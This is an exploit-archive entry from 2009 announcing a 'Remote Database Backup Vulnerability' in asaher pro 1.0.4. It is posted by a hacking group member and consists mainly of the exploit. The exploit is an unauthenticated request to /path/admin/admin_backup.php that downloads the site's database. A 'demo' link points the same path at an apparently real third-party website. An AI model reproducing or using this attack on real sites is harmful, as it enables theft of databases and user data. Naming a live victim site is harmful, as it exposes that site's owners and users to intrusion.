[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : asaher pro 1.0.4 Remote Database Backup Vulnerability
# Published : 2009-08-18
# Author : alnjm33
# Previous Title : Traidnt UP 2.0 Remote SQL Injection Exploit
# Next Title : Ignition 1.2 (comment) Remote Code Injection Vulnerability


:::::::::::::::::::::::::::::::::::::::
found by alnjm33
my site : http://sec-war.com/cc/
mail:alnjm33(at)hotmail.com
::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::Re: asaher pro v1.0.4 Remote Database Backup Vulnerability:::::::::::::::::::::::::::
expolit:
 /path/admin/admin_backup.php <<< you will downlaod the database
view demo
http://daralyamama.com/news/admin/admin_backup.php
::::::::::::::::::::::::::::::::::::::::::::::::::::::::

 Special Thanks : all sec-war.com  members

# www.Syue.com [2009-08-18]